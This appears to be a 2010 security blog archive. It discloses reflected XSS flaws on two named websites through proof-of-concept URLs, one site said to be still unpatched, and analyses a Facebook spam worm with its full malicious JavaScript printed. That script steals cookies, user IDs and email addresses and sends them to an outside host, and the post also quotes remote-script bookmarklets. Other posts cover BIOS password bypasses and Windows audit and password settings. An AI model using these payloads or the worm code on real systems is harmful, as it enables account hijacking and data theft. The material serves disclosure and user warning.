Monday, December 27, 2010

XSS & CSRF Vulnerabilities on Area Startup Website



Hi Guys, I have found major XSS and CSRF vulnerabilities on the Area Startups website while I was just searching for some IT firms' details :P The site is still vulnerable, so I have submitted it to the xssed.com vulnerability database; I hope they will fix it soon :D






Issue Details



Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.



The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.



Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).



Cross-site request forgery (CSRF, sometimes called XSRF) is a simple attack that has a huge impact on web application security.



GET-based CSRF (or blind redirects) is simple with XSS-Proxy. The attacker enters the destination into the "fetch document" admin form; the victim's browser will go to the URL, determine that it can't read the contents, and recover back to where the attacker can perform other actions.



POST-based CSRF is also possible, but requires some JavaScript (via the eval admin form) to perform the attack. The JavaScript could perform a POST-based CSRF if entered in the XSS-Proxy eval admin form (this can be entered as one large command or as multiple eval submissions).







Proof of Concept



Vulnerable Link 1:



http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&sa=Search#842





Screenshot 1:







Vulnerable Link 2:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cscript%3Ealert%28%27This%20Site%20is%20XSS%20Vulnerable%27%29%3C/script%3E&sa=Search#242





Screenshot 2:







Vulnerable Link 3:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Ciframe%20src=http://xssed.com%3E&sa=Search#242





Screenshot 3:









Vulnerable Link 4:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Cmarquee%3E%3Ch1%3EXSS%28This%20Site%20is%20XSS%20Vulnerable%3C/h1%3E%3C/marquee%3E&sa=Search#243





Screenshot 4:









Vulnerable Link 5:

http://www.areastartups.com/search?cx=003315328923615770654%3Apidzer5tuca&cof=FORID%3A9&ie=UTF-8&q=%22%3E%3Ca%20href=%27search?searchterm=%3Cb%3EJust%20Fond%20Out%3C/b%3E%27%3EThis%20Site%20is%20XSS%20Vulnerable%3C/a%3E&sa=Search#243





Screenshot 5:







Video:








Friday, December 24, 2010

Symantec Norton Website XSS Vulnerable


Hi Guys, two weeks back I found that the information security giant Symantec Norton's website has a few XSS vulnerabilities. As of now they have fixed their site, so I am disclosing the issue :)





Issue Details



Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.



The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.



Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
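A defender-side illustration, added here and not part of either post, of why the payloads in the Area Startups (q parameter) and Norton (sfid parameter) PoC links break out of the attribute they are echoed into, and how HTML-escaping the reflected value stops it; the host search.example and all function names are my own constructions.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# The alert(document.cookie) probe from the PoC links above, as the decoded
# parameter value the server actually sees.
XSS_PAYLOAD = '"><script>alert(document.cookie)</script>'


def poc_url(q: str) -> str:
    """Build a PoC-shaped URL (placeholder host, not the real site) with q percent-encoded."""
    return "http://search.example/search?" + urlencode({"q": q, "sa": "Search"})


def reflected_param(url: str, name: str) -> str:
    """Decode the reflected parameter exactly as the application would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_search_vulnerable(q: str) -> str:
    """The defect: q is echoed verbatim into a value="" attribute, so a leading
    "> closes the attribute and the tag, and whatever follows is live HTML."""
    return '<input type="text" name="q" value="' + q + '">'


def render_search_fixed(q: str) -> str:
    """Same markup with the value HTML-escaped (quotes included): the browser
    now shows the payload as text inside the box instead of executing it."""
    return '<input type="text" name="q" value="' + html.escape(q, quote=True) + '">'


def script_tag_present(markup: str) -> bool:
    """Check used by the test: did an unescaped <script> tag reach the response?"""
    return "<script" in markup


if __name__ == "__main__":
    q = reflected_param(poc_url(XSS_PAYLOAD), "q")
    print("vulnerable:", render_search_vulnerable(q))
    print("fixed:     ", render_search_fixed(q))
```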





Proof of Concept



Vulnerable Link 1:

https://buy.norton.com/estore/mf/landingProductFeatures?sfid="><script>alert('xss')</script>Jq23M7YG4pjMHzwGYtlDfhdq1ZYF22vswwCBfgSGGz0k5FrgMHF9!1505726402!1291573284101



or the following code can be used in the search box or input box:



<script>alert('xss')</script>



Screenshot 1:







Vulnerable Link 2:

http://buy.norton.com/estore/mf/landingProductFeatures?sfid="><script>alert('xss')</script>Q72nM7hHJ18nVR9GQVNT3Bz01whgMYMNGSLT1H2nyYDtwwChvs22!1505726402!1291573991721



or the following code can be used in the search box or input box:

  

<script>alert('xss')</script>

 

Screenshot 2:




Monday, December 13, 2010

Reverse Engineering Videos


Reverse Engineering & Related Videos





How-I-learned-Reverse-Engineering-With-Storm-(RECON-2008)

http://videos.securitytube.net/How-I-learned-Reverse-Engineering-With-Storm-(RECON-2008).flv





Reverse Engineering 101 ( Using IDA to break password protections )

http://videos.securitytube.net/Reverse%20Engineering%20101%20(%20Using%20IDA%20to%20break%20password%20protections%20).mp4





Reverse Engineering 101 ( Using IDA to break password protections )_controller

http://videos.securitytube.net/Reverse%20Engineering%20101%20(%20Using%20IDA%20to%20break%20password%20protections%20)_controller.swf





Reverse Engineering 101 ( Using a Hex Editor to Find Passwords )

http://videos.securitytube.net/Reverse%20Engineering%20101%20(%20Using%20a%20Hex%20Editor%20to%20Find%20Passwords%20).mp4





Reverse Engineering and Software Cracking Demo

http://videos.securitytube.net/Reverse-Engineering-Dynamic-Languages-(Recon-2008).flv





Reverse-Engineering-101-(-Using-a-Hex-Editor-to-Find-Passwords-)

http://videos.securitytube.net/Reverse-Engineering-101-(-Using-a-Hex-Editor-to-Find-Passwords-).mp4





Reverse-Engineering-101-(-Using-a-Hex-Editor-to-Find-Passwords-)_controller

http://videos.securitytube.net/Reverse-Engineering-101-(-Using-a-Hex-Editor-to-Find-Passwords-)_controller.swf





Reverse-Engineering-Dynamic-Languages-(Recon-2008)

http://videos.securitytube.net/Reverse-Engineering-Dynamic-Languages-(Recon-2008).flv





Reverse-Engineering-Network-Utilities-Using-Wireshark

http://videos.securitytube.net/Reverse-Engineering-Network-Utilities-Using-Wireshark.mp4





Reverse-Engineering-a-Software-Install-Process

http://videos.securitytube.net/Reverse-Engineering-a-Software-Install-Process.mp4





Reverse-Engineering-over-Acrobat-Reader-using-Immunity-Debugger-(RECON)

http://videos.securitytube.net/Reverse-Engineering-over-Acrobat-Reader-using-Immunity-Debugger-(RECON).flv





Reverse-Engineering-the-Storm-Worm

http://videos.securitytube.net/Reverse-Engineering-the-Storm-Worm.flv





Applied-Reverse-Engineering-on-OS-X-(Recon-2008)

http://videos.securitytube.net/Applied-Reverse-Engineering-on-OS-X-(Recon-2008).flv





Reverse-DNS-Lookup-with-DIG

http://videos.securitytube.net/Reverse-DNS-Lookup-with-DIG.mp4





Reverse-DNS-Lookup-with-DIG_controller

http://videos.securitytube.net/Reverse-DNS-Lookup-with-DIG_controller.swf

Security Videos Collection


Hello everybody, I want to share some of my favourite security-related videos, and I am also giving direct, resumable download links for all of them so that everybody can download them easily. I hope it will be helpful for everybody to learn from them; full credit goes to the real owners of the videos and to the sites where I found them.














Malware Analysis & Related Videos





Helios-Malware-Detection-Demo


http://videos.securitytube.net/Helios-Malware-Detection-Demo.swf







Helios-Malware-Detection-Demo_controller


http://videos.securitytube.net/Helios-Malware-Detection-Demo_controller.swf





Malware-Unpacking-in-OllyDbg

http://videos.securitytube.net/Malware-Unpacking-in-OllyDbg.swf





Simple-Malware-Analyzing

http://videos.securitytube.net/Simple-Malware-Analyzing.flv





Analyzing-Malicious-PDF-Documents


http://videos.securitytube.net/Analyzing-Malicious-PDF-Documents.flv





Botnets,-Ransomware,-Malware,-and-Stuff-(Brucon-2009)

http://videos.securitytube.net/Botnets,-Ransomware,-Malware,-and-Stuff-(Brucon-2009).flv





Analyze-a-Bot-Infected-Host-with-Wireshark

http://videos.securitytube.net/Analyze-a-Bot-Infected-Host-with-Wireshark.mp4





Simple-Linux-Malware-Construction-by-Netinfinity

http://videos.securitytube.net/Simple-Linux-Malware-Construction-by-Netinfinity.flv





Banking-Malware-101


http://videos.securitytube.net/Banking-Malware-101.flv

Friday, December 3, 2010

Be Alert From Malicious Scripts & Spam on Facebook

While analyzing malicious scripts and code used by crackers and spammers, I found that they are using different attack vectors and techniques to compromise innocent users' profiles and to spam using automated techniques, in which they post a comment on a user's profile or send them a new application (many times fake) to use, for example on Facebook or any other social networking profile.





If the user clicks on that posted link or uses that new application (many times fake), the user's account mostly gets compromised if the site is vulnerable to the malicious code or if it is a kind of zero-day exploit, and sometimes the innocent user's profile is bombarded with spam messages, comments, posts, ads and fake application use requests; all these spams also automatically get posted or sent to all the friends of the user's profile.





So guys, if you get a wall post from one of your friends saying some revolving image or new theme thing is out and to view the link to enjoy it, the message would be like this......







Example 1:

Wowww !! cool Facebook revolving images. MUST SEE http://pageragei.tk/



Example 2:

Super cool Facebook revolving images. MUST SEE http://showmyprofile.tk/





When you open any of these malicious sites, they will ask you to copy and paste some JavaScript code like.......







Code :

javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)
And when you press enter after copying and pasting that code into your browser's address bar while on your Facebook account, it will redirect you to the malicious JavaScript link...


That's it: you start spamming all your Facebook friends' walls automatically, and the fire keeps growing as more and more of your friends click on that malicious link.


The malicious JavaScript link is: http://imaginemonkeys.com/majic.js
This link again has the same kind of code, but this time the URL in the code is different......


Code:
javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)
This time the link is: http://graphicgiants.com/majic.js
And when I tried to open it directly in the browser, it blocked me from analyzing it further and showed me the error message mentioned below:

Not Found 

The requested URL /majic.js was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.graphicgiants.com Port 80
 
 
So now I knew something fishy was going on there, as the site has some kind of authentication mechanism and also has mod_security installed to block unauthorised users. So, to analyze it further, I opened and used that malicious code in a secure virtual testing environment with a test profile, and while doing the whole process I used a sniffer to see the background redirections to other URLs and malicious code; I also crawled the other URLs of that site.






So I found out that the redirections were to the Facebook site: whenever a user opens the http://imaginemonkeys.com site directly in the browser, it first redirects the user to http://1.88.channel.facebook.com and then to the official http://facebook.com site.




While testing the URLs inside imaginemonkeys.com, I found that it has a few more links like http://www.imaginemonkeys.com/606/, http://www.imaginemonkeys.com/majic.js etc.




The script that runs inside the JS (JavaScript) file, which is mostly majic.js or the index.php file, shows a URL like: http://www.imaginemonkeys.com/majic.js OR http://imaginemonkeys.com/index.php





The code hidden inside the malicious script is shown below.





Code:
//

//

txt = "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/";

txtee = "Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/";

alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");

with(x = new XMLHttpRequest())
open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";
appname = "rip_m_j";

with(xx = new XMLHttpRequest())
open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"),
onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
i = 0; llimit=25;
t = setInterval(function () {
if (i >= llimit ) return;
if(i == 0) {
with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(llxlxlxlxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
} else if (i == llimit - 1) {
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){
if(xxxx.readyState == 4 && xxxx.status == 200){
with(s = document.createElement("script")) src = "http://revolvingimages.info/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
if(i%2==0) {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
else {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest"); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);
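An analyst-side triage helper, added here and not part of the post, that pulls the staging hosts out of the two bookmarklets quoted above and out of the second-stage loader line inside majic.js, and recognises the paste-into-the-address-bar shape the post warns about. The samples are the page's own strings, re-typed as constructed test input; the function names are mine.

```python
import re
from urllib.parse import urlsplit

# Constructed samples: the two bookmarklets quoted in the post, verbatim, and the
# second-stage loader line from inside majic.js (domains are the ones named above).
BOOKMARKLET_1 = ('javascript:(a = (b = document).createElement("script")).src = '
                 '"//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)')
BOOKMARKLET_2 = ('javascript:(a = (b = document).createElement("script")).src = '
                 '"//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)')
STAGE2_LINE = ('with(s = document.createElement("script")) src = '
               '"http://revolvingimages.info/majic.js?q=" + document.cookie.match(/c_user=(\\d+)/)[1]'
               ' + ":" + d.match(/mailto:([^\\"]+)/)[1] + "&c=" + document.cookie; '
               'document.body.appendChild(s);')

# A src assignment whose value begins with a string literal: .src = "..." or bare src = "..."
SRC_RE = re.compile(r'\bsrc\s*=\s*"([^"]+)"')


def loader_urls(js: str) -> list:
    """Every string literal assigned to src; scheme-relative //host/path included."""
    return SRC_RE.findall(js)


def loader_hosts(js: str) -> list:
    """Hostnames those loaders pull from: the indicators worth blocking or alerting on."""
    hosts = []
    for url in loader_urls(js):
        if not url.startswith(("//", "http://", "https://")):
            url = "//" + url          # bare host/path, treat as scheme-relative
        name = urlsplit(url).hostname
        if name:
            hosts.append(name)
    return hosts


def is_self_xss_bookmarklet(text: str) -> bool:
    """javascript: URL that injects a <script> element pointing at a remote host,
    the exact shape the post tells users never to paste into the address bar."""
    t = text.strip()
    return (t.lower().startswith("javascript:")
            and 'createElement("script")' in t
            and bool(loader_hosts(t)))


def triage(js: str) -> dict:
    """Quick behavioural summary of a captured script fragment."""
    return {
        "hosts": loader_hosts(js),
        "reads_cookie": "document.cookie" in js,
        # a "...&c=" + document.cookie concatenation sends the session cookie off-site
        "exfiltrates_cookie": bool(re.search(r'"[^"]*[?&]c="\s*\+\s*document\.cookie', js)),
        "posts_status": "/ajax/updatestatus.php" in js,
    }


if __name__ == "__main__":
    for sample in (BOOKMARKLET_1, BOOKMARKLET_2, STAGE2_LINE):
        print(is_self_xss_bookmarklet(sample), triage(sample))
```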




Some of the websites you should not visit are mentioned above; the steps below will help if you have been affected:
1. To stop it spamming your wall, simply re-generate your mobile email unique address at
     http://www.facebook.com/mobile/
2. Change your password and also delete all your browser's cookies, browsing history and saved passwords.
3. Don't copy/paste JavaScript or any other unknown scripts into your browser again.
4. And most importantly, never click on unknown links; always check your browser's URL bar that it has https or http://www.facebook.com, not phishing or fake sites like http://www.faacebook or http://www.faceb00k.com.
5. Use a good security suite like AVG 2011 or Norton 2011 or any other, and always update its virus definitions and program components; these security suites have all types of security software built in, like antivirus, anti-spyware, anti-spam, anti-phishing, firewall and IDS etc.
6. Keep your operating system always updated and also update all of your application software, like the browser itself.




So be cautious, guys, whenever you see comments like "Great, now we have such applications in Facebook", and never use these applications nor accept their application use requests.





Two applications which I found are just popping up are "See Who Has Visited Your Profile" and "Profile Privacy v1.2". So please remember that these are FAKE APPLICATIONS and they use such comments on other users' walls to get them to click or use them.





I hope my post is helpful for all of you guys :) Comments are welcome.



Monday, November 22, 2010

How to Reset Any BIOS Password





 

Question:

How to clear any unknown BIOS password?

Answer:

If you have forgotten or lost your BIOS password, or you receive a password prompt at boot that you do not know, you will need to clear the BIOS password by one of the methods below.







Precaution: when working inside the computer, be aware of the potential for ESD (electrostatic discharge).



  • Try using generic BIOS passwords. A complete listing of these passwords can be found on document CH000451.

  • There are utilities designed to help bypass BIOS passwords. An example of a great utility to decrypt / bypass BIOS passwords is the PC BIOS Security and Maintenance toolkit, which is available by clicking here.

  • On the computer motherboard locate the BIOS clear / password jumper or dipswitch and change its position. Once this jumper has been changed, turn on the computer and the password should be cleared. Once cleared, turn the computer off and return the jumper or dipswitch to its original position. 



The location of the jumpers or dipswitches may vary; however, here are general locations where these jumpers / dipswitch may be located.





  1. On the edge of the motherboard - Most jumpers are located on the side of the motherboard for easy accessibility; verify by looking at all visible edges of the motherboard.

  2. By the CMOS battery - Some manufacturers will place the jumper to clear the CMOS / BIOS password by the actual CMOS battery.

  3. By the processor - Some manufacturers will place the jumpers by the processor of the computer. However, note that in some cases these jumpers will be to change the processor and not the password.

  4. Under the keyboard or bottom of laptop - If you are working on a laptop computer, the location of the dipswitch (almost never a jumper) can be under the keyboard or on the bottom of the laptop in a compartment such as the memory compartment.

  5. Other visible location - While it is possible that the jumpers / dipswitches may not be in a visible location, most manufacturers try to make things easier by placing the jumpers / dipswitches in another visible location.



Additionally, when looking for the jumper / dipswitch the label of that switch can be anything; however, in most cases will be labeled CLEAR - CLEAR CMOS - JCMOS1 - CLR - CLRPWD - PASSWD - PASSWORD - PWD.

  • On the computer motherboard locate and remove the CMOS battery for at least 10 minutes allowing the computer to lose its information. Note: this will not work on all computers.



  • If your manufacturer has a bypass password this can be entered and allow you access to the BIOS and/or computer. Because of the security risk of a bypass password, generally only older computers will have this option. In addition, it is likely that this information will only be able to be obtained from the computer, motherboard or BIOS manufacturer.



  • On the computer motherboard locate the CMOS solder beads and jump the solder beads to clear the password. The identification and location of these solder beads can vary and if not available in computer documentation is generally only obtainable through the computer manufacturer.



    If none of the above solutions clears the password, or you are unable to locate the jumpers or solder beads, it is recommended that you contact the computer manufacturer or motherboard manufacturer for the steps on clearing the computer password.



    Wednesday, November 11, 2009

    Audit Policy Settings Basic to In-depth Home Computer Security Guide Page 24










    Audit Policy Settings



    The user can set the Audit Policy settings to determine which security events are reported about user or system activity. For example, the user can choose to audit failed logon attempts, which might indicate that someone is trying to log on with an invalid password (perhaps using a program to automate the attack). Or the user might want to monitor the use of a particular sensitive file. The user can also choose to monitor changes to user accounts and passwords, changes to security policies, and use of privileges that might reveal that someone is trying to "administer" the user's computer—perhaps not with the user's best interests in mind.

    Unlike the other logs that appear in Event Viewer, the Security log is disabled by default in Windows XP Professional and Windows 2000. No events are written to the Security log until the user enables auditing, which is done via Local Security Settings. (In Windows XP Home Edition, security auditing is enabled for certain events. Because Home Edition doesn't include Local Security Settings, the user cannot change which events are audited unless he uses a tool like Auditpol.exe, which is included in the Windows 2000 Resource Kit.) Even if the user sets up auditing for files, folders, or printers, the events he specified aren't recorded unless he also enables auditing by setting a high-level audit policy in Local Security Settings.



    To edit the Audit Policy settings, go to Start menu\Settings\Control Panel\Administrative Tools\Local Security Settings\Local Policies\Audit Policy and check the boxes accordingly.



    The following table gives the Audit policy available in Windows Operating System with their respective descriptions.



    Table-1: Audit Policies for Security Events

    Policy | Description
    Audit account logon events | Account logon events occur when a user attempts to log on or log off across the network, authenticating to a local user account.
    Audit account management | Account management events occur when a user account or security group is created, changed, or deleted; when a user account is renamed, enabled, or disabled; or when a password is set or changed.
    Audit directory service access | Directory service access events occur when a user attempts to access an Active Directory object. (If the computer is not part of a Windows domain, these events won't occur.)
    Audit logon events | Logon events occur when a user attempts to log on or log off a workstation interactively.
    Audit object access | Object access events occur when a user attempts to access a file, folder, printer, registry key, or other object that is set for auditing.
    Audit policy change | Policy change events occur when a change is made to user rights assignment policies, audit policies, trust policies, or password policies.
    Audit privilege use | Privilege use events occur when a user exercises a user right (other than logon, logoff, and network access rights, which trigger other types of
    Audit process tracking | Process tracking includes events such as program activation, handle duplication, indirect object access, and process exit. Although this policy generates a large number of events to wade through, it can provide useful information, such as which program a user used to access an object.
    Audit system events | System events occur when a user restarts or shuts down the computer or when an event affects the system security or the Security log.





    Local Security Settings has some additional policies that affect auditing, but they're not in the Audit Policy folder. Instead, look to the Security Settings\Local Policies\ Security Options folder for these policies:



    • Audit: Audit the use of Backup and Restore privilege. Enable this policy if the user wants to know when someone uses a backup program to back up or restore files. To make this policy effective, the user must also enable Audit Privilege Use in the Audit Policy folder.



    • Audit: Shut down system immediately if unable to log security audits.



    • Audit: Audit the access of global system objects. This policy affects auditing of obscure objects (mutexes and semaphores, for example) that aren't used in most home and small business networks; users can safely ignore it.



    The user should only enable the audit policies which he requires to monitor, as auditing is a time-consuming process and can waste a lot of resources. When auditing is enabled, the system must write an event record to the Security log for each audit check the system performs. This activity can degrade the computer's performance. There is absolutely no need to enable them all; it depends purely on the requirements of the user. For example, Audit Directory Service Access is not required for a home user who is not connected to any Windows Active Directory network.



    In addition, indiscriminate auditing adds to log many events that might be of little value to the user, thereby making the real security issues more difficult to find. And because the Security log has a fixed size, filling it with unimportant events could displace other, more significant events.



    Here are some suggestions for what user should consider auditing:





    • Audit failed logon attempts, which might indicate that someone is trying to log on with various invalid passwords.



    • If the user is concerned about someone using a stolen password to log on, audit successful logon events.



    • To detect use of sensitive files (such as a payroll data file, for example) by unauthorized users, audit successful read and write access as well as failed attempts to use the file by suspected users or groups.



    • If the user uses his computer as a web server, he will want to know whether an attacker has defaced his web pages. By auditing write access to the files that make up the web pages, the user will know whether his site has been vandalized.



    • To detect virus activity, audit successful write access to program files (files with .exe, .com, and .dll file name extensions).



    • If the user is concerned that someone is misusing administrative privileges, audit successful incidents of privilege use, account management, policy changes, and system events.
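The first suggestion above (failed logon attempts as a sign of password guessing) turned into a check over an exported Security log. This is an added example, not part of the guide; the CSV is a constructed, simplified export (a real Event Viewer export has more columns), HOME-PC and the account names are made up, and the threshold and window are my own choices.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta
from io import StringIO

# 529: logon failure (unknown user name or bad password) on Windows 2000/XP;
# 4625: the equivalent on Vista and later. 528 is a successful logon on XP.
FAILED_LOGON_IDS = {"529", "4625"}

# Constructed, simplified export of the Security log: six bad-password events
# for "administrator" inside two minutes, two isolated ones for "bob".
SAMPLE_LOG = """\
date,time,event_id,user,workstation
2009-11-11,08:00:01,528,alice,HOME-PC
2009-11-11,08:02:10,529,administrator,HOME-PC
2009-11-11,08:02:25,529,administrator,HOME-PC
2009-11-11,08:02:40,529,administrator,HOME-PC
2009-11-11,08:03:05,529,administrator,HOME-PC
2009-11-11,08:03:30,529,administrator,HOME-PC
2009-11-11,08:04:00,529,administrator,HOME-PC
2009-11-11,09:10:00,529,bob,HOME-PC
2009-11-11,09:40:00,529,bob,HOME-PC
2009-11-11,09:41:00,528,bob,HOME-PC
"""


def parse_events(text: str) -> list:
    """Parse the export into dicts, adding a real datetime under 'when'."""
    events = []
    for row in csv.DictReader(StringIO(text)):
        row["when"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        events.append(row)
    return events


def failed_logon_bursts(events: list, threshold: int = 5,
                        window: timedelta = timedelta(minutes=5)) -> dict:
    """Accounts with at least `threshold` failed logons inside any `window`,
    mapped to the largest burst seen (sliding window over sorted timestamps)."""
    by_user = defaultdict(list)
    for e in events:
        if e["event_id"] in FAILED_LOGON_IDS:
            by_user[e["user"]].append(e["when"])
    flagged = {}
    for user, times in by_user.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1          # drop failures that fell out of the window
            size = end - start + 1
            if size >= threshold:
                flagged[user] = max(flagged.get(user, 0), size)
    return flagged


if __name__ == "__main__":
    for user, n in failed_logon_bursts(parse_events(SAMPLE_LOG)).items():
        print(f"{user}: {n} failed logons within 5 minutes, possible password guessing")
```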





    Event Viewer



    A component a user can use to view and manage event logs, gather information about hardware and software problems, and monitor security events. It maintains logs of three kinds: application, system, and security.



    Check the security logs in Event Viewer regularly.



    To open Event Viewer follow steps given below:



    Start menu\Settings\Control Panel\Administrative Tools\Event Viewer







    That's the end of the tutorial; in future I will update this tutorial.



    Various Techniques Used by Hackers to Retrieve Passwords Basic to In-depth Home Computer Security Guide Page 23

    Various Techniques Used by Hackers to Retrieve Passwords





    ·One way of stealing a password is standing behind an individual and looking over their shoulder while they are typing it, or searching for the papers on which they have written the password.



    ·Another way of stealing a password is through guessing. Hackers try all the possible combinations with the help of an individual's personal information.



    ·When there is a large number of possible password combinations, hackers use fast processors and software tools to crack the password. This method of cracking passwords is known as a "brute force attack".



    ·Hackers also try all the possible words in a dictionary to crack the password with the help of some software tools. This is called a "dictionary attack".



    Sample password:



    IJ!5iS@g0odP4s5wD ---->This is a good password



    administrator123 --->bad password





    Password Policy



    It is a general practice of users to keep the same password for life; rather, users should change their passwords regularly.



    Passwords should be complex and changed regularly. The password policy settings control the complexity of the password. To edit the password policy settings, go to Start menu\Settings\Control Panel\Administrative Tools\Local Security Settings\Account Policies\Password Policy and set each of the following options:



    • Enforce Password History



    • Maximum Password Age



    • Minimum Password Age



    • Minimum Password Length



    • Password Must Meet Complexity Requirement



    Whenever the user is required to use a password, he should use a strong password that conforms to the following countermeasures:



• At least seven characters in length (the longer the better)



• Includes upper- and lower-case letters, numerals and symbols



• Has at least one symbol character in the second through sixth position



• Has at least four different characters (no repeats)



• Looks like a sequence of random letters and numbers



• Don’t use any part of the logon name in the password



• Don’t use any actual word or name in ANY language



• Don’t use numbers in place of similar-looking letters



• Don’t reuse any portion of an old password



• Don’t use consecutive letters or numbers like "abcdefg" or "234567"



• Don’t use adjacent keys on the keyboard like "qwerty"



A good way to create a strong password is to use the first letters of a phrase that the user can easily remember.





    Login settings



